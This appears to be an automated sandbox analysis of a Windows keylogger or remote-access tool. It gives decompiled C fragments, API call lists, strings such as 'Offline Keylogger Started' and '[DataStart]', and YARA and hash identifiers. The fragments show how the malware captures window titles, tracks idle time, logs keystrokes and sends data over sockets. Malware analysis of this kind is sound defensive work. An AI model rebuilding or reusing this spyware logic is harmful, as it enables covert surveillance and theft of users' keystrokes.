								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E013B54E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}
























                                            0x013b59c7
                                            0x013b59cc
                                            0x013b59cc
                                            0x013b59d2
                                            0x00000000
                                            0x00000000
                                            0x013b59e4
                                            0x013b59e6
                                            0x013b59f6
                                            0x013b5a01
                                            0x013b5a06
                                            0x013b5a0c
                                            0x013b5a12
                                            0x013b5a18
                                            0x013b5a1b
                                            0x013b5a21
                                            0x013b5a28
                                            0x013b5a28
                                            0x013b5a2f
                                            0x013b5a37
                                            0x013b5a40
                                            0x013b5a4a
                                            0x013b5a52
                                            0x013b5a58
                                            0x013b5a61
                                            0x013b5a6b
                                            0x013b5a6d
                                            0x013b5a76
                                            0x013b5a7f
                                            0x013b5a8a
                                            0x013b5a90
                                            0x013b5a96
                                            0x013b5ab5
                                            0x013b5ac9
                                            0x013b5ad3
                                            0x013b5adb
                                            0x013b5ade
                                            0x013b5ae6
                                            0x013b5a98
                                            0x013b5a98
                                            0x013b5aa1
                                            0x013b5aaa
                                            0x013b5aaa
                                            0x013b5a96
                                            0x013b5a6b
                                            0x013b5aec
                                            0x013b5aef
                                            0x013b5af1
                                            0x013b5b02
                                            0x013b5b97
                                            0x013b5b9a
                                            0x00000000
                                            0x013b5b08
                                            0x013b5b08
                                            0x013b5b16
                                            0x013b5b1d
                                            0x013b5b3d
                                            0x013b5b4d
                                            0x013b5b5c
                                            0x013b5b6c
                                            0x013b5b76
                                            0x013b5b7b
                                            0x013b5b80
                                            0x013b5b88
                                            0x013b5b91
                                            0x00000000
                                            0x013b5b91
                                            0x013b5b24
                                            0x013b5b27
                                            0x013b5b27
                                            0x013b5ba8
                                            0x00000000
                                            0x013b5ba8
                                            0x013b5b02
                                            0x013b5bb4

                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013B59F6
                                            • Sleep.KERNELBASE(000001F4), ref: 013B5A0C
                                            • GetForegroundWindow.USER32 ref: 013B5A12
                                            • GetWindowTextLengthA.USER32(00000000), ref: 013B5A1B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 013B5A2F
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B5A40
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B5A4A
                                            • GetWindowTextA.USER32 ref: 013B5A52
                                            • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,013CB998), ref: 013B5A61
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 013B5A76
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B5A7F
                                            • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 013B5A8A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B5AA1
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 013B5AC9
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 013B5AD3
                                              • Part of subcall function 013B54E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B54FC
                                              • Part of subcall function 013B54E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B550F
                                              • Part of subcall function 013B54E9: SetEvent.KERNEL32(00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B5518
                                              • Part of subcall function 013B54E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B5527
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 013B5AE6
                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 013B5B27
                                            • _itoa.MSVCRT ref: 013B5B3D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 013B5B5C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 013B5B6C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013B5B76
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5B88
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5B91
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5B9A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 013B5BA8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                            • String ID: [ ${ User has been idle for $ ]$ minutes }
                                            • API String ID: 615312007-3343415809
                                            • Opcode ID: 80095137a3a411f9199b5beb170e7b6e13e516d1e986af3c0a905b188e639aff
                                            • Instruction ID: dda46b7264ed0a9fd6e992298dc9aa088b84c910d165a6484b93188861cdadb6
                                            • Opcode Fuzzy Hash: 80095137a3a411f9199b5beb170e7b6e13e516d1e986af3c0a905b188e639aff
                                            • Instruction Fuzzy Hash: C551A372E00209AFDB11EBA5D8D99EEBF7CEF54719F040019E602E3544EB70B949CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B221E, Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,013CBE70,00000000), ref: 013B2230
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(013CB300,013C5664), ref: 013B2248
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B2257
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B2261
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 013B227A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2283
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(013BD2A6), ref: 013B2291
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013BD2A6,013CBEA4), ref: 013B22A2
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B22C2
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(013CB300,013C5664), ref: 013B22DA
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(013BD2A6), ref: 013B22EC
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6F525DF0), ref: 013B2302
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B230C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2315
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,013BD2A6), ref: 013B2326
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B2330
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2339
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B234D
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 013B2363
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 013B236D
                                            • CreateThread.KERNELBASE ref: 013B237E
                                            • WaitForSingleObject.KERNEL32(000003DC,000000FF), ref: 013B2389
                                            • CloseHandle.KERNEL32(000003DC), ref: 013B2392
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,013BD2B5,6F525DF0), ref: 013B23A7
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B23B1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B23BA
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B23C3
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B23D5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B23E3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 3745950881-0
                                            • Opcode ID: 106d176875e8410070dfc59bf661c5da5531b09a1c7c9173dcf9ca7e64fc752d
                                            • Instruction ID: 8d162a86431963f8f931b3d9b67fc3f2ff88c197bcd10bbd27751fe2e2ef6ce0
                                            • Opcode Fuzzy Hash: 106d176875e8410070dfc59bf661c5da5531b09a1c7c9173dcf9ca7e64fc752d
                                            • Instruction Fuzzy Hash: 82512E7260020AEFCB149FA4D889DEEBF7DFF54349F040119FA0696554DB70B98ACB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B2440, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBE70,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B244A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2463
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B246E
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B247B
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B248D
                                            • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2498
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24A7
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24B1
                                            • send.WS2_32(?,00000000), ref: 013B24BB
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24C7
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24D1
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24EB
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24F5
                                            • send.WS2_32(?,00000000), ref: 013B24FF
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2509
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2512
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B251B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                            • String ID: [DataStart]
                                            • API String ID: 1403384299-3852763199
                                            • Opcode ID: f75fa604ff9c28fd7b6429e853de7f1b420b6f546fdafe0a204cfc0bf6b2913d
                                            • Instruction ID: cfc20f593556bc000ba1c13d64d81d4f41cbfe9cf3f6beff4aa8bce4f026f7c8
                                            • Opcode Fuzzy Hash: f75fa604ff9c28fd7b6429e853de7f1b420b6f546fdafe0a204cfc0bf6b2913d
                                            • Instruction Fuzzy Hash: 5621A87160010AAFDB15EFA4E959AEE77BDEB18716F100129F903A6194EB707E04CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B9D3C, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 013B9D63
                                              • Part of subcall function 013BB4C8: RegOpenKeyExA.KERNELBASE(80000001,013B8EBE,00000000,00020019,013B8EBE,?,?,?,013B8EBE,80000001,00000000,?,?,?,?,0000000E), ref: 013BB4E7
                                              • Part of subcall function 013BB4C8: RegQueryValueExA.KERNELBASE(013B8EBE,?,00000000,80000001,?,00000000,013CBCB0,?,?,?,013B8EBE,80000001,00000000), ref: 013BB505
                                              • Part of subcall function 013BB4C8: RegCloseKey.KERNELBASE(013B8EBE,?,?,?,013B8EBE,80000001,00000000,?,?,?,?,0000000E,013C5774), ref: 013BB510
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(013CBA28,?,?,?,00000001), ref: 013B9D96
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 013B9DB3
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9DC6
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 013B9DDC
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C66F0), ref: 013B9DE5
                                            • Sleep.KERNELBASE(00000BB8), ref: 013B9DFA
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(013CBA28,?,?,?,00000001), ref: 013B9E11
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 013B9E2E
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9E41
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 013B9E57
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C66F0), ref: 013B9E60
                                            • exit.MSVCRT ref: 013B9E77
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                            • String ID: 2.7.2 Pro$override$pth_unenc
                                            • API String ID: 3602623569-3893205188
                                            • Opcode ID: 7a4d0629832b6ae634015f1a74c2ae2143e98b21f8eee41acd7ca3bfe0abb05d
                                            • Instruction ID: 43edcdd6c74a7f787d8607bdabf7d2df5f5fe856a3d9af8f2037ac2affd395a5
                                            • Opcode Fuzzy Hash: 7a4d0629832b6ae634015f1a74c2ae2143e98b21f8eee41acd7ca3bfe0abb05d
                                            • Instruction Fuzzy Hash: A431A7B1B001047FEB1477A99C8BBFE7B6DEF54B1AF44000CF70596285EFA5694187A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C29EB, Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                            • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6F525DF0), ref: 013C2A90
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A9A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AA3
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                            • String ID:
                                            • API String ID: 3435050692-0
                                            • Opcode ID: e2218e41329f09dfe67da83293c84f3207c8a39c66807049d1cab624d259cb42
                                            • Instruction ID: 52fbd1b5e6330d6b3f6a224b21e67755105f2694a4a268479f1149c9c471ccd4
                                            • Opcode Fuzzy Hash: e2218e41329f09dfe67da83293c84f3207c8a39c66807049d1cab624d259cb42
                                            • Instruction Fuzzy Hash: FB31B67660010EAFCB14DFA4E998DDE7B7DEF58716F104019F906A6154EB30BB09CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5180, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 26%
                                            			E013B5180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E013B5156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x13cb154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E013B5DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E013C203B();
				CreateThread(0, 0, E013B528A, _t19, 0, 0); // executed
				if( *_t19 == 0) {
					CreateThread(0, 0, E013B526A, _t19, 0, 0); // executed
				}
				_t14 = CreateThread(0, 0, E013B5299, _t19, 0, 0); // executed
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                            0x013b5185
                                            0x013b5190
                                            0x013b5194
                                            0x013b519c
                                            0x013b51a8
                                            0x013b51ad
                                            0x013b51af
                                            0x013b51b9
                                            0x013b51c1
                                            0x013b51c1
                                            0x013b51d0
                                            0x013b51e4
                                            0x013b51ea
                                            0x013b5204
                                            0x013b5208
                                            0x013b5214
                                            0x013b5214
                                            0x013b5220
                                            0x013b5225
                                            0x013b522f

                                            APIs
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,747843E0,013CBCB0,00000000,013CB900,?,013B95B7,?,?,?,?,?,?,?,?,00000000), ref: 013B5194
                                              • Part of subcall function 013B5156: GetKeyboardLayout.USER32 ref: 013B515B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 013B51B9
                                              • Part of subcall function 013B5DD3: GetLocalTime.KERNEL32(?,747843E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,013B51C6), ref: 013B5DE1
                                              • Part of subcall function 013B5DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,013B51C6), ref: 013B5DF9
                                              • Part of subcall function 013B5DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 013B5E06
                                              • Part of subcall function 013B5DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 013B5E12
                                              • Part of subcall function 013B5DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E1B
                                              • Part of subcall function 013B5DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E24
